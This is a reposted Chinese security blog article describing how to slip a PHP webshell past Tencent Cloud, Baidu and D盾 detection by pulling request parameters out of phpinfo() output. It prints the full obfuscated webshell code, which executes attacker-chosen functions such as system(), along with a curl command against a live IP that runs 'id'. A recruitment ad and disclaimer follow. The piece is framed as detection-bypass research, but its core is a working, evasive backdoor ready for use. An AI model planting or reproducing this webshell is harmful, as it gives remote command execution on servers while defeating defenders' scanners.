通过phpinfo传参绕过腾讯云webshell查杀

admin 2022年5月6日09:34:15安全文章评论85 views1253字阅读4分10秒阅读模式

通过phpinfo传参绕过腾讯云webshell查杀

大家都知道webshell的执行分为数据输入、数据传递、数据执行三个阶段,目前可以查阅的资料大多数都是在数据传输和数据执行阶段的绕过,在数据传输阶段的绕过极少,因为通常用来进行数据传输的GET、POST、REQUEST、COOKIE、SESSION、SERVER、FILES、GLOBALS等常见获取外部传参函数都已经被查杀了,而且十分敏感,甚至出现就报毒,后来即使有一些获取外部传参的函数也马上被杀了,例如filter_input函数。

这一次我仍然希望能够从数据输入点绕过腾讯云的webshell,于是我就去寻找能够获取外部传参的函数,但是市面上的基本被查杀的很死了,这个时候发现了phpinfo()函数,它提供关于系统中安装的php版本和php配置的详细信息,但是它同时也记录了外部传参。
当没有给phpinfo传入参数的时候,phpinfo的返回如下:

通过phpinfo传参绕过腾讯云webshell查杀


当给phpinfo传入huo=system参数的时候,phpinfo的返回如下


通过phpinfo传参绕过腾讯云webshell查杀


由于phpinfo函数并没有主动危害性,所以大多数的webshell检测引擎都不会将他加入黑名单,我们利用他来获取传参自然也不会被杀。

最终实现如下:

<?phpphpinfo();if(file_exists(__FILE__)){    $b = fn() => basename(__FILE__);}ob_start();require_once($b());phpinfo();$content = ob_get_contents();ob_end_clean();preg_match('/huo.*?">(.*?)<.*?chen.*?">(.*?)</s', $content, $arr);$a=explode(',',$arr[1])[0];$b=${(explode(',',$arr[2])[0])}{0};($c??=$a)($b);

百度检测引擎检测结果:

通过phpinfo传参绕过腾讯云webshell查杀

D盾检测结果:

通过phpinfo传参绕过腾讯云webshell查杀

腾讯云检测结果:

通过phpinfo传参绕过腾讯云webshell查杀

使用方法:

curl "http://180.76.174.84/test/test7.php?huo=system&chen=_GET&0=id"

执行结果:

通过phpinfo传参绕过腾讯云webshell查杀


当然最后没有通过审核,审核给出的原因是“缓冲区利用的绕过手法重复”。不过可以借鉴学习,以寻找更多的可以获取外部传参的函数用于从数据输入处绕过检测引擎。


来源:先知(https://xz.aliyun.com/t/11233)

注:如有侵权请联系删除


通过phpinfo传参绕过腾讯云webshell查杀


船山院士网络安全团队长期招募学员,零基础上课,终生学习,知识更新,学习不停!包就业,护网,实习,加入团队,外包项目等机会,月薪10K起步,互相信任是前提,一起努力是必须,成就高薪是目标!相信我们的努力你可以看到!想学习的学员,加下面小浪队长的微信咨询!



通过phpinfo传参绕过腾讯云webshell查杀

欢迎大家加群一起讨论学习和交流
(此群已满200人,需要添加群主邀请)

通过phpinfo传参绕过腾讯云webshell查杀

快乐要懂得分享,

才能加倍的快乐。


原文始发于微信公众号(衡阳信安):通过phpinfo传参绕过腾讯云webshell查杀

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月6日09:34:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  通过phpinfo传参绕过腾讯云webshell查杀 http://cn-sec.com/archives/978462.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: